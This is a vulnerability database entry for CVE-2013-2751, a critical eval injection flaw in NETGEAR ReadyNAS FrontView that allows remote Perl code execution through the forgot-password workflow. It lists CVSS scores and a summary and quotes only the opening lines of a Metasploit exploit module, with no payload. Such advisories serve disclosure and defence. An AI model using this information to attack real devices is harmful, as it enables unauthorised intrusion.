10
CVSSv2

CVE-2013-2751

Published: 12/12/2013 Updated: 18/07/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Eval injection vulnerability in frontview/lib/np_handler.pl in the FrontView web interface in NETGEAR ReadyNAS RAIDiator prior to 4.1.12 and 4.2.x prior to 4.2.24 allows remote malicious users to execute arbitrary Perl code via a crafted request, related to the "forgot password workflow."

Vulnerable Product Search on Vulmon Subscribe to Product

netgear raidiator

Exploits

## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' =& ...